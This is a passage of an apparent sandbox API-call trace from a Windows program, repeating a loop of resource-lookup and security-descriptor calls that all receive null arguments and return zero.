(hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.080] LockResource (hResData=0x0) returned 0x0 [0070.080] FreeResource (hResData=0x0) returned 0 [0070.080] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.080] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.080] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.080] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.080] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.080] LockResource (hResData=0x0) returned 0x0 [0070.080] FreeResource (hResData=0x0) returned 0 [0070.080] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.080] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.080] LockResource (hResData=0x0) returned 0x0 [0070.080] FreeResource (hResData=0x0) returned 0 [0070.080] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.080] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.080] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.080] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.080] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.080] LockResource (hResData=0x0) returned 0x0 [0070.080] FreeResource (hResData=0x0) returned 0 [0070.080] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.080] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.080] LockResource (hResData=0x0) returned 0x0 [0070.080] FreeResource (hResData=0x0) returned 0 [0070.080] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.080] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.080] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.080] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.080] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.080] LockResource (hResData=0x0) returned 0x0 [0070.080] FreeResource (hResData=0x0) returned 0 [0070.080] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.080] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.080] LockResource (hResData=0x0) returned 0x0 [0070.080] FreeResource (hResData=0x0) returned 0 [0070.080] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.081] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.081] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.081] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.081] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.081] LockResource (hResData=0x0) returned 0x0 [0070.081] FreeResource (hResData=0x0) returned 0 [0070.081] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.081] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.081] LockResource (hResData=0x0) returned 0x0 [0070.081] FreeResource (hResData=0x0) returned 0 [0070.081] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.081] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.081] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.081] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.081] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.081] LockResource (hResData=0x0) returned 0x0 [0070.081] FreeResource (hResData=0x0) returned 0 [0070.081] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.081] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.081] LockResource (hResData=0x0) returned 0x0 [0070.081] FreeResource (hResData=0x0) returned 0 [0070.081] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.081] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.081] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.081] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.081] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.081] LockResource (hResData=0x0) returned 0x0 [0070.081] FreeResource (hResData=0x0) returned 0 [0070.081] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.081] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.081] LockResource (hResData=0x0) returned 0x0 [0070.081] FreeResource (hResData=0x0) returned 0 [0070.081] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.081] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.081] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.081] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.081] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.081] LockResource (hResData=0x0) returned 0x0 [0070.081] FreeResource (hResData=0x0) returned 0 [0070.081] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.081] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.081] LockResource (hResData=0x0) returned 0x0 [0070.081] FreeResource (hResData=0x0) returned 0 [0070.081] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.081] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.081] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.081] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.081] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.081] LockResource (hResData=0x0) returned 0x0 [0070.081] FreeResource (hResData=0x0) returned 0 [0070.081] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.082] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.082] LockResource (hResData=0x0) returned 0x0 [0070.082] FreeResource (hResData=0x0) returned 0 [0070.082] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.082] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.082] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.082] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.082] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.082] LockResource (hResData=0x0) returned 0x0 [0070.082] FreeResource (hResData=0x0) returned 0 [0070.082] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.082] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.082] LockResource (hResData=0x0) returned 0x0 [0070.082] FreeResource (hResData=0x0) returned 0 [0070.082] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.082] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.082] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.082] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.082] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.082] LockResource (hResData=0x0) returned 0x0 [0070.082] FreeResource (hResData=0x0) returned 0 [0070.082] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.082] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.082] LockResource (hResData=0x0) returned 0x0 [0070.082] FreeResource (hResData=0x0) returned 0 [0070.082] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.082] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.082] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.082] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.082] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.082] LockResource (hResData=0x0) returned 0x0 [0070.082] FreeResource (hResData=0x0) returned 0 [0070.082] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.082] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.082] LockResource (hResData=0x0) returned 0x0 [0070.082] FreeResource (hResData=0x0) returned 0 [0070.082] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.082] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.082] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.082] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.082] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.082] LockResource (hResData=0x0) returned 0x0 [0070.082] FreeResource (hResData=0x0) returned 0 [0070.082] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.082] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.082] LockResource (hResData=0x0) returned 0x0 [0070.082] FreeResource (hResData=0x0) returned 0 [0070.082] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.082] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.082] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.082] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.083] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.083] LockResource (hResData=0x0) returned 0x0 [0070.083] FreeResource (hResData=0x0) returned 0 [0070.083] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.083] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.083] LockResource (hResData=0x0) returned 0x0 [0070.083] FreeResource (hResData=0x0) returned 0 [0070.083] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.083] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.083] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.083] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.083] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.083] LockResource (hResData=0x0) returned 0x0 [0070.083] FreeResource (hResData=0x0) returned 0 [0070.083] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.083] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.083] LockResource (hResData=0x0) returned 0x0 [0070.083] FreeResource (hResData=0x0) returned 0 [0070.083] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.083] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.083] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.083] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.083] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.083] LockResource (hResData=0x0) returned 0x0 [0070.083] FreeResource (hResData=0x0) returned 0 [0070.083] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.083] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.083] LockResource (hResData=0x0) returned 0x0 [0070.083] FreeResource (hResData=0x0) returned 0 [0070.083] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.083] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.083] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.083] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.083] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.083] LockResource (hResData=0x0) returned 0x0 [0070.083] FreeResource (hResData=0x0) returned 0 [0070.083] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.083] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.083] LockResource (hResData=0x0) returned 0x0 [0070.083] FreeResource (hResData=0x0) returned 0 [0070.083] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.083] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.083] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.083] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.083] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.083] LockResource (hResData=0x0) returned 0x0 [0070.083] FreeResource (hResData=0x0) returned 0 [0070.083] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.083] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.083] LockResource (hResData=0x0) returned 0x0 [0070.083] FreeResource (hResData=0x0) returned 0 [0070.084] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.084] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.084] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.084] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.084] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.084] LockResource (hResData=0x0) returned 0x0 [0070.084] FreeResource (hResData=0x0) returned 0 [0070.084] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.084] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.084] LockResource (hResData=0x0) returned 0x0 [0070.084] FreeResource (hResData=0x0) returned 0 [0070.084] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.084] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.084] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.084] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.084] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.084] LockResource (hResData=0x0) returned 0x0 [0070.084] FreeResource (hResData=0x0) returned 0 [0070.084] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.084] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.084] LockResource (hResData=0x0) returned 0x0 [0070.084] FreeResource (hResData=0x0) returned 0 [0070.084] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.084] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.084] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.084] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.084] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.084] LockResource (hResData=0x0) returned 0x0 [0070.084] FreeResource (hResData=0x0) returned 0 [0070.084] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.084] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.084] LockResource (hResData=0x0) returned 0x0 [0070.084] FreeResource (hResData=0x0) returned 0 [0070.084] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.084] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.084] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.084] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.084] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.084] LockResource (hResData=0x0) returned 0x0 [0070.084] FreeResource (hResData=0x0) returned 0 [0070.084] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.084] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.084] LockResource (hResData=0x0) returned 0x0 [0070.084] FreeResource (hResData=0x0) returned 0 [0070.084] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.084] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.084] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.084] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.084] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.084] LockResource (hResData=0x0) returned 0x0 [0070.085] FreeResource (hResData=0x0) returned 0 [0070.085] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.085] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.085] LockResource (hResData=0x0) returned 0x0 [0070.085] FreeResource (hResData=0x0) returned 0 [0070.085] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.085] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.085] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.085] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.085] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.085] LockResource (hResData=0x0) returned 0x0 [0070.085] FreeResource (hResData=0x0) returned 0 [0070.085] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.085] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.085] LockResource (hResData=0x0) returned 0x0 [0070.085] FreeResource (hResData=0x0) returned 0 [0070.085] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.085] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.085] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.085] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.085] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.085] LockResource (hResData=0x0) returned 0x0 [0070.085] FreeResource (hResData=0x0) returned 0 [0070.085] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.085] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.085] LockResource (hResData=0x0) returned 0x0 [0070.085] FreeResource (hResData=0x0) returned 0 [0070.085] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.085] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.085] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.085] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.085] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.085] LockResource (hResData=0x0) returned 0x0 [0070.085] FreeResource (hResData=0x0) returned 0 [0070.085] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.085] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.085] LockResource (hResData=0x0) returned 0x0 [0070.085] FreeResource (hResData=0x0) returned 0 [0070.085] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.085] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.085] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.085] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.085] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.085] LockResource (hResData=0x0) returned 0x0 [0070.085] FreeResource (hResData=0x0) returned 0 [0070.085] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.085] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.085] LockResource (hResData=0x0) returned 0x0 [0070.085] FreeResource (hResData=0x0) returned 